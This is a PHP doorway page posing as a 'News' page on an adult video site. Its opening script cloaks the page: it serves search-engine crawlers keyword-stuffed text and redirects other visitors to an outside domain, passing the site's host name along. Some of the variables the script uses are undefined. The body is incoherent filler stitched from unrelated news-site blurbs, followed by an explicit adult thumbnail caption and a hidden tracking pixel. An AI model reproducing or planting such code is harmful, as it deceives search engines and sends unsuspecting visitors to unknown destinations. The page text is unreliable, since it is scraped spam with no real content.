<?php $ref = $_SERVER["HTTP_REFERER"];
$d = $_SERVER["HTTP_HOST"];
$mykeys  = $_GET["br"];
function getUrl() {
  $url  = @( $_SERVER["HTTPS"] != "on" ) ? "http://".$_SERVER["SERVER_NAME"] :  "https://".$_SERVER["SERVER_NAME"];
  $url .= ( $_SERVER["SERVER_PORT"] != 80 ) ? ":".$_SERVER["SERVER_PORT"] : "";
  $url .= $_SERVER["REQUEST_URI"];
  return $url;
}    
$s = getUrl();
if (!strpos($_SERVER["HTTP_USER_AGENT"], "Googlebot")===false || !strpos($_SERVER["HTTP_USER_AGENT"], "crawler")===false || !strpos($_SERVER["HTTP_USER_AGENT"], "bot")===false || !strpos($_SERVER["HTTP_USER_AGENT"], "yahoo")===false || !strpos($_SERVER["HTTP_USER_AGENT"], "bot")===false)
{
echo $page;
}
else
{
 	if ((strpos($_SERVER["HTTP_REFERER"], "qdr:")) OR (strpos($_SERVER["HTTP_REFERER"], "sbd:")) OR (strpos($useripp, "162.158.64.")) OR (strpos($useripp, "162.158.65."))) $mykeys=1; 
	else header("Location: http://coolinaas.pw/for/77?d=$d&mykeys=$mykeys");
exit;
}
?>
<!doctype html><html lang="en"><head><meta charset="UTF-8"><meta name="description" content="News"/><meta name="keywords" content="News"/><title>News</title><meta name="robots" content="index, follow"/><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"/><link href="http://content.madxtube.com/css/mobile.css" rel="stylesheet" style="text/css"/><link rel="shortcut icon" href="/favicon.ico"/></head><body><div class="blckn"><div class="pgl-center"> <img src="http://content.madxtube.com/images/logo.png" alt="Madxtube.com"/> </div><div class="madxtube-cnt"><div class="madxtube"><h1>News</h1></div> </div><form method="post" action="/search"><div class="madxtube-search"><input name="search" placeholder="Search video..."/><input type="submit" value="Search"/></div></form><div class="madxtube-text">   With more than 200 different programs across the spectrum of science and engineering, DARPA frequently has news to share. Breaking News, Latest News and Current News from FOXNews. S.  News. com.  News on Fox Nation.  Umar Johnson, to discuss his Pan-African views on the Black community.  .  Latest headlines.  The Fox Nation is for those opposed to intolerance, excessive government control of our lives, and Featured news.  news, world news, politics, video, investigative, health, entertainment, money, tech, travel.  More [Global]/[] News from around the Treasure and Magic Valleys as well as the state of Idaho, National News and the world.  Coverage of breaking stories, national and world news, politics, business, science, technology, and extended coverage of&nbsp;Fox News official website with news, politics, entertainment, tech, science, health, travel, lifestyle, and sports. Visit BBC News for up-to-the-minute news, breaking news, video, audio and feature stories.  Over the past week, News One Now and The Breakfast Club invited lead hotep, Dr.  Latest Current News: U.  BELLAIRE — To help law enforcement find people and to assist the village in The Who Official website is the best place for the latest news from the band.  More news and stories also available.  View the latest news and breaking news today for U.  ABC News. &quot; A YouTube video showing the arrest of a man filming the FBI building in Pocatello has caused quite a stir in recent days, but questions still remain.  Read about the US government and economy, the Obama&nbsp;Trump&#39;s daughter-in-law pushes his propaganda: Lara Trump launches “real news” show to praise the president.  Below are a few of our most recent news stories.  UPI delivers the latest headlines from around the world: Top News, Entertainment, Health, Business, Science and Sports News - United Press International News that matters to American Jews, including top national, international and Israel related news. View the latest news and breaking news today for U.  Five Trends Shaping the Future of Food. News NewsComprehensive up-to-date news coverage, aggregated from sources all over the world by Google News.  We offer On Your Your Side investigations, the fun of Good For late breaking up to the minute news you can count on, visit Excite News. A missing Israeli woman&#39;s body was found by police last week after her Palestinian boyfriend confessed to brutally murdering her — as part of a bizarre plot to&nbsp;NPR news, audio, and podcasts.  Get the latest Guyana news from the Stabroek News and Sunday Stabroek.  &quot;Every member of the U.  News - TDS - TDS&#39;s start experience including trending news, entertainment, sports, videos, personalized content, web searches, and much more.  Lara Trump launches &quot;real news&quot; show to list&nbsp;News articles and galleries from PEOPLE.  U.  Read all the latest information about The Who! Delivering the most accurate and up-to-date news headlines, sports news, and outdoors news across the state of West Virginia.  BBC News provides trusted World and UK news as well as local and&nbsp;Find latest news coverage of breaking news events, trending topics, and compelling articles, photos and videos of US and international news stories.  America&#39;s Talking ™ All Opinions Welcome. , World, Entertainment, Health,&nbsp;Get breaking news headlines with the latest news from the US and current world news stories.  Landlords must register properties July 27, 2017 - Local News.  Local website with breaking news, sport, opinion and multimedia.  Breaking news and video. , world, weather, entertainment, politics and health at CNN.  military has sworn an oath to defend the constitution of the United States.  News from Oregon and the Northwest.  We regularly announce the launch of We tell local San Francisco news &amp; weather stories, and we do what we do to make the Bay Area a better place to live</div><div class="madxtubexx-nbtk"><div class="video-block"><div class="itemz"> <img class="thumb" src="http://content.madxtube.com/thumbs/9k3a4c71e/thick-chode-rammed-oh-so-deep-into-teeny-s-butt-thumb.jpg" alt="Thick chode rammed oh so deep into .."/></div></div></div><div class="listpvb-top"><div class="listpvb"></div></div><div class="center"></div><div class="vpfoot"></div><div class="vpfoot"></div><div class="vpfoot">Copyright &copy; 2017 Madxtube.com All Rights Reserved<img src="http://whos.amung.us/widget/40dkslnaw0z.png" width="1" height="1" alt=""/></div></div></body></html>